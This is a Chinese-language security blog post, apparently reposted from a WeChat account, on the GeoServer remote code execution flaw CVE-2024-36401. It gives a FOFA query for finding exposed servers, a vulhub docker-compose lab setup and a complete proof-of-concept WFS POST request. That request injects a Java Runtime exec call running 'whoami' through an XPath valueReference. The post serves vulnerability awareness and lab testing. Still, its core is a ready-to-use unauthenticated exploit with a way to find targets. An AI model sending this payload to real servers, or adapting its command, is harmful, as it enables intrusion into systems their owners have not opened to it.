GeoServer 远程代码执行漏洞（CVE-2024-36401）

2024年7月4日00:01:48评论8 views字数 985阅读3分17秒阅读模式

漏洞简介

GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。

网络测绘

FOFA：app="GeoServer"

GeoServer 远程代码执行漏洞（CVE-2024-36401）

环境搭建

#docker-compose.yml文件version: '3'services: web:   image: vulhub/geoserver:2.23.2   ports:    - "8080:8080"    - "5005:5005"

docker compose up -d

GeoServer 远程代码执行漏洞（CVE-2024-36401）

漏洞Poc‍‍

POST /geoserver/wfs HTTP/1.1Host: Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Content-Type: application/xml

<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'>  <wfs:Query typeNames='sf:archsites'/>  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'whoami')</wfs:valueReference></wfs:GetPropertyValue>

漏洞检测与利用‍

GeoServer 远程代码执行漏洞（CVE-2024-36401）

原文始发于微信公众号（南街老友）：GeoServer 远程代码执行漏洞（CVE-2024-36401）

左青龙
微信扫一扫

右白虎
微信扫一扫

GeoServer 远程代码执行漏洞（CVE-2024-36401）

Apache HTTP Server 源代码泄露漏洞CVE-2024-39884

Splunk Splunk Enterprise未授权路径遍历漏洞CVE-2024-36991

Apache Tomcat资源分配控制不当CVE-2024-34750

Apache Tomcat 资源分配控制不当

0day|GeoServer远程代码执行漏洞(CVE-2024-36401)

Geoserver最全历史漏洞详解

HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

发表评论

在线咨询

微信